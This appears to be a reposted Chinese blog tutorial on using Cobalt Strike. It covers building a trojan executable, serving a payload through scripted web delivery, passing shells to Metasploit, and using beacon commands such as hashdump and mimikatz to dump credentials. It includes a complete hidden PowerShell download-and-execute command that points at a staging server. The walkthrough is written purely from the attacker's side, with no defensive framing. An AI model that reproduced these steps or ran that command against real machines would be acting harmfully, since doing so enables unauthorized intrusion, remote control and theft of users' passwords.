博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Cobalt Strike 简单使用
阅读量:5010 次
发布时间:2019-06-12

本文共 876 字,大约阅读时间需要 2 分钟。

1、运行服务端

其中afanti就是密码

Alt text

2、客户端

用户名随意写,密码添afanti

Alt text

3、创建listener

Alt text

4、生成木马客户端

Attacks->Packages->Windows Executable

选择刚刚生成的listener,生成木马到桌面。

Alt text
双击artifact.exe木马,客户就能上线。

另一种上线方式

Attacks->Packages->Payload Generator

选择一种语言生成payload

Alt text

Attacks->web Drive-by->Scripted Web Delivery

这个模块相当于搭建一个web服务器,将payload放到服务器上让客户端下载执行。

Alt text

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.61.128:80/aaa'))"

通过msf接收shell

在Cobalt Strik中执行,先添加一个监听命令,名称为:msf payload选择:windows/foreign/reverse_tcp 监听端口:4444

Alt text

Alt text

选择刚刚建立的msf_litener
Alt text
msf配置好在交互界面点击spawn就会把shell弹到msf上,shell弹回来
Alt text

beacon模块使用

截屏

运行截图命令

Alt text
在view->screenshot查看
Alt text

抓hash

beacon> sleep 0  //快速显示结果beacon> wdigest //读取信息beacon>hashdump   //读取账号hash密码值,需要administer权限,右击受害者主机--access-hashdumpbeacon> logonpasswords  //运行mimikatz, 右击受害者主机--access- RUN mimikatz

其他功能参考下面链接。

参考链接:

转载于:https://www.cnblogs.com/afanti/p/10321562.html

你可能感兴趣的文章
JavaScript 开发规范要求
查看>>
Devstack 安装OpenStack Pike版本(单机环境)
查看>>
Javascript 函数初探
查看>>
类的定义、声明使用
查看>>
转载,gini系数代码对应的公式
查看>>
编译安装mysql-5.6.40
查看>>
年终总结
查看>>
初创互联网公司技术架构变迁之路
查看>>
【BZOJ 3676】 3676: [Apio2014]回文串 (SAM+Manacher+倍增)
查看>>
【网络流24题】No. 13 星际转移问题 (网络判定 最大流)
查看>>
解析$.grep()源码及透过$.grep()看(两次取反)!!的作用
查看>>
[模板] 字符串hash
查看>>
SGU438_The Glorious Karlutka River =)
查看>>
Linux集群及LVS简介
查看>>
简单几何(直线与圆的交点) ZOJ Collision 3728
查看>>
Codeforces Round #327 (Div. 2)
查看>>
如何解决Provisional headers are shown问题(转)
查看>>
开发网站遇到的bug
查看>>
实现简单的接口自动化测试平台
查看>>
EXCEL工作表合并
查看>>